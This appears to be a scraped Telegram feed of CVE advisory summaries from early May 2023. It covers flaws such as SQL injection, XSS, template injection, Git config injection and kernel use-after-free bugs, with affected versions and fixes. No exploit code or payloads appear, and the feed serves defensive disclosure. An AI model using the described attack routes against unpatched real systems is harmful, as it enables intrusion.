🚨 CVE-2023-26360Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-05-01 20:58:24 |
🚨 CVE-2023-30612Cloud hypervisor is a Virtual Machine Monitor for Cloud workloads. This vulnerability allows users to close arbitrary open file descriptors in the Cloud Hypervisor process via sending malicious HTTP request through the HTTP API socket. As a result, the Cloud Hypervisor process can be easily crashed, causing Deny-of-Service (DoS). This can also be a potential Use-After-Free (UAF) vulnerability. Users require to have the write access to the API socket file to trigger this vulnerability. Impacted versions of Cloud Hypervisor include upstream main branch, v31.0, and v30.0. The vulnerability was initially detected by our `http_api_fuzzer` via oss-fuzz. This issue has been addressed in versions 30.1 and 31.1. Users unable to upgrade may mitigate this issue by ensuring the write access to the API socket file is granted to trusted users only.🎖@cveNotify |
|
| 2023-05-01 20:58:22 |
🚨 CVE-2023-30614Pay is a payments engine for Ruby on Rails 6.0 and higher. In versions prior to 6.3.2 a payments info page of Pay is susceptible to reflected Cross-site scripting. An attacker could create a working URL that renders a javascript link to a user on a Rails application that integrates Pay. This URL could be distributed via email to specifically target certain individuals. If the targeted application contains a functionality to submit user-generated content (such as comments) the attacker could even distribute the URL using that functionality. This has been patched in version 6.3.2 and above. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-05-01 20:58:21 |
🚨 CVE-2023-30611Discourse-reactions is a plugin that allows user to add their reactions to the post in the Discourse messaging platform. In affected versions data about what reactions were performed on a post in a private topic could be leaked. This issue has been addressed in version 0.3. Users are advised to upgrade. Users unable to upgrade should disable the discourse-reactions plugin to fully mitigate the issue.🎖@cveNotify |
|
| 2023-05-01 20:58:17 |
🚨 CVE-2021-43819Stargate-Bukkit is a mod for the minecraft video game which adds a portal focused environment. In affected versions Minecarts with chests will drop their items when teleporting through a portal; when they reappear, they will still have their items impacting the integrity of the game world. The teleport code has since been rewritten and is available in release `0.11.5.1`. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-05-01 20:58:16 |
🚨 CVE-2023-30610aws-sigv4 is a rust library for low level request signing in the aws cloud platform. The `aws_sigv4::SigningParams` struct had a derived `Debug` implementation. When debug-formatted, it would include a user's AWS access key, AWS secret key, and security token in plaintext. When TRACE-level logging is enabled for an SDK, `SigningParams` is printed, thereby revealing those credentials to anyone with access to logs. All users of the AWS SDK for Rust who enabled TRACE-level logging, either globally (e.g. `RUST_LOG=trace`), or for the `aws-sigv4` crate specifically are affected. This issue has been addressed in a set of new releases. Users are advised to upgrade. Users unable to upgrade should disable TRACE-level logging for AWS Rust SDK crates.🎖@cveNotify |
|
| 2023-05-01 20:58:15 |
🚨 CVE-2023-22894Strapi through 4.5.5 allows attackers (with access to the admin panel) to discover sensitive user details by exploiting the query filter. The attacker can filter users by columns that contain sensitive information and infer a value from API responses. If the attacker has super admin access, then this can be exploited to discover the password hash and password reset token of all users. If the attacker has admin panel access to an account with permission to access the username and email of API users with a lower privileged role (e.g., Editor or Author), then this can be exploited to discover sensitive information for all API users but not other admin accounts.🎖@cveNotify |
|
| 2023-05-01 20:58:14 |
🚨 CVE-2023-22621Strapi through 4.5.5 allows authenticated Server-Side Template Injection (SSTI) that can be exploited to execute arbitrary code on the server. A remote attacker with access to the Strapi admin panel can inject a crafted payload that executes code on the server into an email template that bypasses the validation checks that should prevent code execution.🎖@cveNotify |
|
| 2023-05-01 18:58:35 |
🚨 CVE-2023-22921A cross-site scripting (XSS) vulnerability in the Zyxel NBG-418N v2 firmware versions prior to V1.00(AARP.14)C0 could allow a remote authenticated attacker with administrator privileges to store malicious scripts using a web management interface parameter, resulting in denial-of-service (DoS) conditions on an affected device.🎖@cveNotify |
|
| 2023-05-01 18:58:34 |
🚨 CVE-2023-22923A format string vulnerability in a binary of the Zyxel NBG-418N v2 firmware versions prior to V1.00(AARP.14)C0 could allow a remote authenticated attacker to cause denial-of-service (DoS) conditions on an affected device.🎖@cveNotify |
|
| 2023-05-01 18:58:33 |
🚨 CVE-2023-22924A buffer overflow vulnerability in the Zyxel NBG-418N v2 firmware versions prior to V1.00(AARP.14)C0 could allow a remote authenticated attacker with administrator privileges to cause denial-of-service (DoS) conditions by executing crafted CLI commands on a vulnerable device.🎖@cveNotify |
|
| 2023-05-01 18:58:32 |
🚨 CVE-2023-30553Archery is an open source SQL audit platform. The Archery project contains multiple SQL injection vulnerabilities, that may allow an attacker to query the connected databases. Affected versions are subject to multiple SQL injections in the `sql_api/api_workflow.py` endpoint `ExecuteCheck`. User input coming from the `db_name` parameter value and the `full_sql` parameter value in the `api_workflow.py` `ExecuteCheck` endpoint is passed to the methods that follow in given SQL engine implementations, which concatenate user input unsafely into a SQL query and afterwards pass it to the `query` method of each database engine for execution. The affected methods are `execute_check` in `sql/engines/clickhouse.py` which concatenates input which is passed to execution on the database in the `sql/engines/clickhouse.py` `query` method, `execute_check` in `sql/engines/goinception.py`which concatenates input which is passed to execution on the database in the `sql/engines/goinception.py` `query` method, `execute_check` in `sql/engines/oracle.py`which passes unsafe user input into the `object_name_check` method in `sql/engines/oracle.py` which in turn is passed to execution on the database in the `sql/engines/oracle.py` `query` method. Each of these issues may be mitigated by escaping user input or by using prepared statements when executing SQL queries. This issue is also indexed as `GHSL-2022-102`.🎖@cveNotify |
|
| 2023-05-01 18:58:28 |
🚨 CVE-2023-30536slim/psr7 is a PSR-7 implementation for use with Slim 4. In versions prior to 1.6.1 an attacker could sneak in a newline (\n) into both the header names and values. While the specification states that \r\n\r\n is used to terminate the header list, many servers in the wild will also accept \n\n. An attacker that is able to control the header names that are passed to Slilm-Psr7 would be able to intentionally craft invalid messages, possibly causing application errors or invalid HTTP requests being sent out with an PSR-18 HTTP client. The latter might present a denial of service vector if a remote service’s web application firewall bans the application due to the receipt of malformed requests. The issue has been patched in version 1.6.1. There are no known workarounds to this issue. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-05-01 18:58:27 |
🚨 CVE-2023-2208A vulnerability, which was classified as critical, has been found in Campcodes Retro Basketball Shoes Online Store 1.0. This issue affects some unknown processing of the file details.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-226973 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-01 18:58:26 |
🚨 CVE-2023-2206A vulnerability classified as critical has been found in Campcodes Retro Basketball Shoes Online Store 1.0. This affects an unknown part of the file contactus.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-226971.🎖@cveNotify |
|
| 2023-05-01 18:58:22 |
🚨 CVE-2023-29636Cross site scripting (XSS) vulnerability in ZHENFENG13 My-Blog, allows attackers to inject arbitrary web script or HTML via the "title" field in the "blog management" page due to the the default configuration not using MyBlogUtils.cleanString.🎖@cveNotify |
|
| 2023-05-01 18:58:21 |
🚨 CVE-2023-29637Cross Site Scripting (XSS) vulnerability in Qbian61 forum-java, allows attackers to inject arbitrary web script or HTML via editing the article content in the "article editor" page.🎖@cveNotify |
|
| 2023-05-01 18:58:20 |
🚨 CVE-2023-29639Cross site scripting (XSS) vulnerability in ZHENFENG13 My-Blog, allows attackers to inject arbitrary web script or HTML via editing an article in the "blog article" page due to the default configuration not utilizing MyBlogUtils.cleanString.🎖@cveNotify |
|
| 2023-05-01 18:58:16 |
🚨 CVE-2023-29641Cross Site Scripting (XSS) vulnerability in pandao editor.md thru 1.5.0 allows attackers to inject arbitrary web script or HTML via crafted markdown text.🎖@cveNotify |
|
| 2023-05-01 18:58:15 |
🚨 CVE-2023-2451A vulnerability was found in SourceCodester Online DJ Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/bookings/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227795.🎖@cveNotify |
|
| 2023-05-01 18:58:14 |
🚨 CVE-2023-2205A vulnerability was found in Campcodes Retro Basketball Shoes Online Store 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /function/login.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-226970 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-01 16:58:45 |
🚨 CVE-2023-1892Cross-site Scripting (XSS) - Reflected in GitHub repository sidekiq/sidekiq prior to 7.0.8.🎖@cveNotify |
|
| 2023-05-01 16:58:44 |
🚨 CVE-2023-29528XWiki Commons are technical libraries common to several other top level XWiki projects. The "restricted" mode of the HTML cleaner in XWiki, introduced in version 4.2-milestone-1 and massively improved in version 14.6-rc-1, allowed the injection of arbitrary HTML code and thus cross-site scripting via invalid HTML comments. As a consequence, any code relying on this "restricted" mode for security is vulnerable to JavaScript injection ("cross-site scripting"/XSS). When a privileged user with programming rights visits such a comment in XWiki, the malicious JavaScript code is executed in the context of the user session. This allows server-side code execution with programming rights, impacting the confidentiality, integrity and availability of the XWiki instance. This problem has been patched in XWiki 14.10, HTML comments are now removed in restricted mode and a check has been introduced that ensures that comments don't start with `>`. There are no known workarounds apart from upgrading to a version including the fix.🎖@cveNotify |
|
| 2023-05-01 16:58:43 |
🚨 CVE-2023-30456An issue was discovered in arch/x86/kvm/vmx/nested.c in the Linux kernel before 6.2.8. nVMX on x86_64 lacks consistency checks for CR0 and CR4.🎖@cveNotify |
|
| 2023-05-01 16:58:42 |
🚨 CVE-2022-45064The SlingRequestDispatcher doesn't correctly implement the RequestDispatcher API resulting in a generic type of include-based cross-site scripting issues on the Apache Sling level. The vulnerability is exploitable by an attacker that is able to include a resource with specific content-type and control the include path (i.e. writing content). The impact of a successful attack is privilege escalation to administrative power.Please update to Apache Sling Engine >= 2.14.0 and enable the "Check Content-Type overrides" configuration option.🎖@cveNotify |
|
| 2023-05-01 16:58:41 |
🚨 CVE-2022-45801Apache StreamPark 1.0.0 to 2.0.0 have a LDAP injection vulnerability.LDAP Injection is an attack used to exploit web based applicationsthat construct LDAP statements based on user input. When anapplication fails to properly sanitize user input, it's possible tomodify LDAP statements through techniques similar to SQL Injection.LDAP injection attacks could result in the granting of permissions tounauthorized queries, and content modification inside the LDAP tree.This risk may only occur when the user logs in with ldap, and the username and password login will not be affected, Users of the affectedversions should upgrade to Apache StreamPark 2.0.0 or later.🎖@cveNotify |
|
| 2023-05-01 16:58:37 |
🚨 CVE-2022-45802Streampark allows any users to upload a jar as application, but there is no mandatory verification of the uploaded file type, causing users to upload some high-risk files, and may upload them to any directory, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later🎖@cveNotify |
|
| 2023-05-01 16:58:36 |
🚨 CVE-2022-46365Apache StreamPark 1.0.0 before 2.0.0 When the user successfully logs in, to modify his profile, the username will be passed to the server-layer as a parameter, but not verified whether the user name is the currently logged user and whether the user is legal, This will allow malicious attackers to send any username to modify and reset the account, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.🎖@cveNotify |
|
| 2023-05-01 16:58:35 |
🚨 CVE-2022-48186A certificate validation vulnerability exists in the Baiying Android application which could lead to information disclosure.🎖@cveNotify |
|
| 2023-05-01 16:58:34 |
🚨 CVE-2022-4568A directory permissions management vulnerability in Lenovo System Update may allow elevation of privileges.🎖@cveNotify |
|
| 2023-05-01 16:58:33 |
🚨 CVE-2023-0683A valid, authenticated XCC user with read only access may gain elevated privileges through a specifically crafted API call.🎖@cveNotify |
|
| 2023-05-01 16:58:29 |
🚨 CVE-2023-25492A valid, authenticated user may be able to trigger a denial of service of the XCC web user interface or other undefined behavior through a format string injection vulnerability in a web interface API.🎖@cveNotify |
|
| 2023-05-01 16:58:28 |
🚨 CVE-2023-28092A potential security vulnerability has been identified in HPE ProLiant RL300 Gen11 Server. The vulnerability could result in the system being vulnerable to exploits by attackers with physical access inside the server chassis.🎖@cveNotify |
|
| 2023-05-01 16:58:27 |
🚨 CVE-2023-2176A vulnerability was found in compare_netdev_and_ip in drivers/infiniband/core/cma.c in RDMA in the Linux Kernel. The improper cleanup results in out-of-boundary read, where a local user can utilize this problem to crash the system or escalation of privilege.🎖@cveNotify |
|
| 2023-05-01 16:58:26 |
🚨 CVE-2023-2131Versions of INEA ME RTU firmware prior to 3.36 are vulnerable to OS command injection, which could allow an attacker to remotely execute arbitrary code.🎖@cveNotify |
|
| 2023-05-01 16:58:25 |
🚨 CVE-2023-0896A default password was reported in Lenovo Smart Clock Essential with Alexa Built In that could allow unauthorized device access to an attacker with local network access. 🎖@cveNotify |
|
| 2023-05-01 16:58:21 |
🚨 CVE-2023-30061D-Link DIR-879 v105A1 is vulnerable to Authentication Bypass via phpcgi.🎖@cveNotify |
|
| 2023-05-01 16:58:20 |
🚨 CVE-2023-30063D-Link DIR-890L FW1.10 A1 is vulnerable to Authentication bypass.🎖@cveNotify |
|
| 2023-05-01 16:58:19 |
🚨 CVE-2023-30859Triton is a Minecraft plugin for Spigot and BungeeCord that helps you translate your Minecraft server. The CustomPayload packet allows you to execute commands on the spigot/bukkit console. When you enable bungee mode in the config it will enable the bungee bridge and the server will begin to broadcast the 'triton:main' plugin channel. Using this plugin channel you are able to send a payload packet containing a byte (2) and a string (any spigot command). This could be used to make yourself a server operator and be used to extract other user information through phishing (pretending to be an admin), many servers use essentials so the /geoip command could be available to them, etc. This could also be modified to allow you to set the servers language, set another players language, etc. This issue affects those who have bungee enabled in config. This issue has been fixed in version 3.8.4.🎖@cveNotify |
|
| 2023-05-01 16:58:18 |
🚨 CVE-2023-28003A CWE-613: Insufficient Session Expiration vulnerability exists that could allow an attacker tomaintain unauthorized access over a hijacked session in PME after the legitimate user hassigned out of their account.🎖@cveNotify |
|
| 2023-05-01 15:58:17 |
🚨 CVE-2023-29921PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create app interface.🎖@cveNotify |
|
| 2023-05-01 15:58:13 |
🚨 CVE-2023-2235A use-after-free vulnerability in the Linux Kernel Performance Events system can be exploited to achieve local privilege escalation.The perf_group_detach function did not check the event's siblings' attach_state before calling add_event_to_groups(), but remove_on_exec made it possible to call list_del_event() on before detaching from their group, making it possible to use a dangling pointer causing a use-after-free vulnerability.We recommend upgrading past commit fd0815f632c24878e325821943edccc7fde947a2.🎖@cveNotify |
|
| 2023-05-01 15:58:12 |
🚨 CVE-2023-30543@web3-react is a framework for building Ethereum Apps . In affected versions the `chainId` may be outdated if the user changes chains as part of the connection flow. This means that the value of `chainId` returned by `useWeb3React()` may be incorrect. In an application, this means that any data derived from `chainId` could be incorrect. For example, if a swapping application derives a wrapped token contract address from the `chainId` *and* a user has changed chains as part of their connection flow the application could cause the user to send funds to the incorrect address when wrapping. This issue has been addressed in PR #749 and is available in updated npm artifacts. There are no known workarounds for this issue. Users are advised to upgrade.🎖@cveNotify |
|
| 2023-05-01 13:58:34 |
🚨 CVE-2023-2413A vulnerability was found in SourceCodester AC Repair and Services System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/bookings/manage_booking.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227707.🎖@cveNotify |
|
| 2023-05-01 13:58:33 |
🚨 CVE-2023-31484CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.🎖@cveNotify |
|
| 2023-05-01 13:58:29 |
🚨 CVE-2023-31485GitLab::API::v4 through 0.26 does not verify TLS certificates when connecting to a GitLab server, enabling machine-in-the-middle attacks.🎖@cveNotify |
|
| 2023-05-01 13:58:28 |
🚨 CVE-2023-31486HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.🎖@cveNotify |
|
| 2023-05-01 13:58:27 |
🚨 CVE-2023-2417A vulnerability was found in ks-soft Advanced Host Monitor up to 12.56 and classified as problematic. Affected by this issue is some unknown functionality of the file C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe. The manipulation leads to unquoted search path. It is possible to launch the attack on the local host. Upgrading to version 12.60 is able to address this issue. It is recommended to upgrade the affected component. VDB-227714 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-01 13:58:26 |
🚨 CVE-2023-2418A vulnerability was found in Konga 2.8.3 on Kong. It has been classified as problematic. This affects an unknown part of the component Login API. The manipulation leads to insufficiently random values. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. The associated identifier of this vulnerability is VDB-227715.🎖@cveNotify |
|
| 2023-05-01 13:58:25 |
🚨 CVE-2023-2419A vulnerability was found in Zhong Bang CRMEB 4.6.0. It has been declared as critical. This vulnerability affects the function videoUpload of the file \crmeb\app\services\system\attachment\SystemAttachmentServices.php. The manipulation of the argument filename leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227716.🎖@cveNotify |
|
| 2023-05-01 13:58:21 |
🚨 CVE-2023-2421A vulnerability classified as problematic has been found in Control iD RHiD 23.3.19.0. Affected is an unknown function of the file /v2/#/add/department. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-227718 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-05-01 13:58:20 |
🚨 CVE-2022-41736IBM Spectrum Scale Container Native Storage Access 5.1.2.1 through 5.1.6.0contains an unspecified vulnerability that could allow a local user to obtain root privileges. IBM X-Force ID: 237810.🎖@cveNotify |
|
| 2023-05-01 13:58:19 |
🚨 CVE-2022-43871IBM Financial Transaction Manager for SWIFT Services 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 239707.🎖@cveNotify |
|
| 2023-05-01 13:58:18 |
🚨 CVE-2023-30792Anchor tag hrefs in Lexical prior to v0.10.0 would render javascript: URLs, allowing for cross-site scripting on link clicks in cases where input was being parsed from untrusted sources.🎖@cveNotify |
|
| 2023-05-01 13:58:14 |
🚨 CVE-2023-2409A vulnerability, which was classified as critical, was found in SourceCodester AC Repair and Services System 1.0. This affects an unknown part of the file /admin/services/view_service.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-227703.🎖@cveNotify |
|
| 2023-05-01 13:58:13 |
🚨 CVE-2023-2410A vulnerability has been found in SourceCodester AC Repair and Services System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/bookings/view_booking.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-227704.🎖@cveNotify |
|
| 2023-05-01 13:58:12 |
🚨 CVE-2023-31483tar/TarFileReader.cpp in Cauldron cbang before bastet-v8.1.17 has a directory traversal during extraction that allows the attacker to create or write to files outside the current directory via a crafted tar archive.🎖@cveNotify |
|
| 2023-05-01 10:58:38 |
🚨 CVE-2023-25815In Git for Windows, the Windows port of Git, no localized messages are shipped with the installer. As a consequence, Git is expected not to localize messages at all, and skips the gettext initialization. However, due to a change in MINGW-packages, the `gettext()` function's implicit initialization no longer uses the runtime prefix but uses the hard-coded path `C:\mingw64\share\locale` to look for localized messages. And since any authenticated user has the permission to create folders in `C:\` (and since `C:\mingw64` does not typically exist), it is possible for low-privilege users to place fake messages in that location where `git.exe` will pick them up in version 2.40.1.This vulnerability is relatively hard to exploit and requires social engineering. For example, a legitimate message at the end of a clone could be maliciously modified to ask the user to direct their web browser to a malicious website, and the user might think that the message comes from Git and is legitimate. It does require local write access by the attacker, though, which makes this attack vector less likely. Version 2.40.1 contains a patch for this issue. Some workarounds are available. Do not work on a Windows machine with shared accounts, or alternatively create a `C:\mingw64` folder and leave it empty. Users who have administrative rights may remove the permission to create folders in `C:\`.🎖@cveNotify |
|
| 2023-05-01 10:58:37 |
🚨 CVE-2023-29007Git is a revision control system. Prior to versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, a specially crafted `.gitmodules` file with submodule URLs that are longer than 1024 characters can used to exploit a bug in `config.c::git_config_copy_or_rename_section_in_file()`. This bug can be used to inject arbitrary configuration into a user's `$GIT_DIR/config` when attempting to remove the configuration section associated with that submodule. When the attacker injects configuration values which specify executables to run (such as `core.pager`, `core.editor`, `core.sshCommand`, etc.) this can lead to a remote code execution. A fix A fix is available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid running `git submodule deinit` on untrusted repositories or without prior inspection of any submodule sections in `$GIT_DIR/config`.🎖@cveNotify |
|
| 2023-05-01 10:58:36 |
🚨 CVE-2023-25652Git is a revision control system. Prior to versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, by feeding specially crafted input to `git apply --reject`, a path outside the working tree can be overwritten with partially controlled contents (corresponding to the rejected hunk(s) from the given patch). A fix is available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid using `git apply` with `--reject` when applying patches from an untrusted source. Use `git apply --stat` to inspect a patch before applying; avoid applying one that create a conflict where a link corresponding to the `*.rej` file exists.🎖@cveNotify |
|
| 2023-05-01 10:58:35 |
🚨 CVE-2023-1668A flaw was found in openvswitch (OVS). When processing an IP packet with protocol 0, OVS will install the datapath flow without the action modifying the IP header. This issue results (for both kernel and userspace datapath) in installing a datapath flow matching all IP protocols (nw_proto is wildcarded) for this flow, but with an incorrect action, possibly causing incorrect handling of other IP packets with a != 0 IP protocol that matches this dp flow.🎖@cveNotify |
|
| 2023-05-01 10:58:34 |
🚨 CVE-2023-28205A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-05-01 10:58:32 |
🚨 CVE-2023-25358A use-after-free vulnerability in WebCore::RenderLayer::addChild in WebKitGTK before 2.36.8 allows attackers to execute code remotely.🎖@cveNotify |
|
| 2023-05-01 10:58:31 |
🚨 CVE-2022-40897Python Packaging Authority (PyPA) setuptools before 65.5.1 allows remote attackers to cause a denial of service via HTML in a crafted package or custom PackageIndex page. There is a Regular Expression Denial of Service (ReDoS) in package_index.py.🎖@cveNotify |
|
| 2023-05-01 10:58:30 |
🚨 CVE-2022-3109An issue was discovered in the FFmpeg package, where vp3_decode_frame in libavcodec/vp3.c lacks check of the return value of av_malloc() and will cause a null pointer dereference, impacting availability.🎖@cveNotify |
|
| 2023-05-01 10:58:29 |
🚨 CVE-2022-0108Inappropriate implementation in Navigation in Google Chrome prior to 97.0.4692.71 allowed a remote attacker to leak cross-origin data via a crafted HTML page.🎖@cveNotify |
|
| 2023-05-01 10:58:28 |
🚨 CVE-2018-25085A vulnerability classified as problematic was found in Responsive Menus 7.x-1.x-dev on Drupal. Affected by this vulnerability is the function responsive_menus_admin_form_submit of the file responsive_menus.module of the component Configuration Setting Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 7.x-1.7 is able to address this issue. The name of the patch is 3c554b31d32a367188f44d44857b061eac949fb8. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-227755.🎖@cveNotify |
|
| 2023-05-01 05:58:23 |
🚨 CVE-2015-10105A vulnerability, which was classified as critical, was found in IP Blacklist Cloud Plugin up to 3.42 on WordPress. This affects the function valid_js_identifier of the file ip_blacklist_cloud.php of the component CSV File Import. The manipulation of the argument filename leads to path traversal. It is possible to initiate the attack remotely. Upgrading to version 3.43 is able to address this issue. The name of the patch is 6e6fe8c6fda7cbc252eef083105e08d759c07312. It is recommended to upgrade the affected component. The identifier VDB-227757 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-01 00:58:34 |
🚨 CVE-2023-28625mod_auth_openidc is an authentication and authorization module for the Apache 2.x HTTP server that implements the OpenID Connect Relying Party functionality. In versions 2.0.0 through 2.4.13.1, when `OIDCStripCookies` is set and a crafted cookie supplied, a NULL pointer dereference would occur, resulting in a segmentation fault. This could be used in a Denial-of-Service attack and thus presents an availability risk. Version 2.4.13.2 contains a patch for this issue. As a workaround, avoid using `OIDCStripCookies`.🎖@cveNotify |
|
| 2023-05-01 00:58:33 |
🚨 CVE-2023-28755A ReDoS issue was discovered in the URI component through 0.12.0 in Ruby through 3.2.1. The URI parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to URI objects. The fixed versions are 0.12.1, 0.11.1, 0.10.2 and 0.10.0.1.🎖@cveNotify |
|
| 2023-05-01 00:58:32 |
🚨 CVE-2021-32066An issue was discovered in Ruby through 2.6.7, 2.7.x through 2.7.3, and 3.x through 3.0.1. Net::IMAP does not raise an exception when StartTLS fails with an an unknown response, which might allow man-in-the-middle attackers to bypass the TLS protections by leveraging a network position between the client and the registry to block the StartTLS command, aka a "StartTLS stripping attack."🎖@cveNotify |
|
| 2023-05-01 00:58:31 |
🚨 CVE-2021-32791mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. In mod_auth_openidc before version 2.4.9, the AES GCM encryption in mod_auth_openidc uses a static IV and AAD. It is important to fix because this creates a static nonce and since aes-gcm is a stream cipher, this can lead to known cryptographic issues, since the same key is being reused. From 2.4.9 onwards this has been patched to use dynamic values through usage of cjose AES encryption routines.🎖@cveNotify |
|
| 2023-05-01 00:58:27 |
🚨 CVE-2021-32792mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. In mod_auth_openidc before version 2.4.9, there is an XSS vulnerability in when using `OIDCPreservePost On`.🎖@cveNotify |
|
| 2023-05-01 00:58:26 |
🚨 CVE-2021-32785mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. When mod_auth_openidc versions prior to 2.4.9 are configured to use an unencrypted Redis cache (`OIDCCacheEncrypt off`, `OIDCSessionType server-cache`, `OIDCCacheType redis`), `mod_auth_openidc` wrongly performed argument interpolation before passing Redis requests to `hiredis`, which would perform it again and lead to an uncontrolled format string bug. Initial assessment shows that this bug does not appear to allow gaining arbitrary code execution, but can reliably provoke a denial of service by repeatedly crashing the Apache workers. This bug has been corrected in version 2.4.9 by performing argument interpolation only once, using the `hiredis` API. As a workaround, this vulnerability can be mitigated by setting `OIDCCacheEncrypt` to `on`, as cache keys are cryptographically hashed before use when this option is enabled.🎖@cveNotify |
|
| 2023-05-01 00:58:25 |
🚨 CVE-2021-31810An issue was discovered in Ruby through 2.6.7, 2.7.x through 2.7.3, and 3.x through 3.0.1. A malicious FTP server can use the PASV response to trick Net::FTP into connecting back to a given IP address and port. This potentially makes curl extract information about services that are otherwise private and not disclosed (e.g., the attacker can conduct port scans and service banner extractions).🎖@cveNotify |
|
| 2023-05-01 00:58:24 |
🚨 CVE-2020-25613An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.🎖@cveNotify |
|
| 2023-05-01 00:58:20 |
🚨 CVE-2019-20479A flaw was found in mod_auth_openidc before version 2.4.1. An open redirect issue exists in URLs with a slash and backslash at the beginning.🎖@cveNotify |
|
| 2023-05-01 00:58:19 |
🚨 CVE-2019-16201WEBrick::HTTPAuth::DigestAuth in Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 has a regular expression Denial of Service cause by looping/backtracking. A victim must expose a WEBrick server that uses DigestAuth to the Internet or a untrusted network.🎖@cveNotify |
|
| 2023-05-01 00:58:18 |
🚨 CVE-2017-17742Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5.x before 2.5.1, and 2.6.0-preview1 allows an HTTP Response Splitting attack. An attacker can inject a crafted key and value into an HTTP response for the HTTP server of WEBrick.🎖@cveNotify |
|
| 2023-05-01 00:58:17 |
🚨 CVE-2019-16254Ruby through 2.4.7, 2.5.x through 2.5.6, and 2.6.x through 2.6.4 allows HTTP Response Splitting. If a program using WEBrick inserts untrusted input into the response header, an attacker can exploit it to insert a newline character to split a header, and inject malicious content to deceive clients. NOTE: this issue exists because of an incomplete fix for CVE-2017-17742, which addressed the CRLF vector, but did not address an isolated CR or an isolated LF.🎖@cveNotify |
|
| 2023-04-30 20:58:12 |
🚨 CVE-2020-10650A deserialization flaw was discovered in jackson-databind through 2.9.10.4. It could allow an unauthenticated user to perform code execution via ignite-jta or quartz-core: org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup, org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory, and org.quartz.utils.JNDIConnectionProvider.🎖@cveNotify |
|
| 2023-04-30 19:15:46 |
CVE Notify pinned «https://t.me/malwr» |
|
| 2023-04-30 19:15:43 |
https://t.me/malwr |
|
| 2023-04-30 17:58:13 |
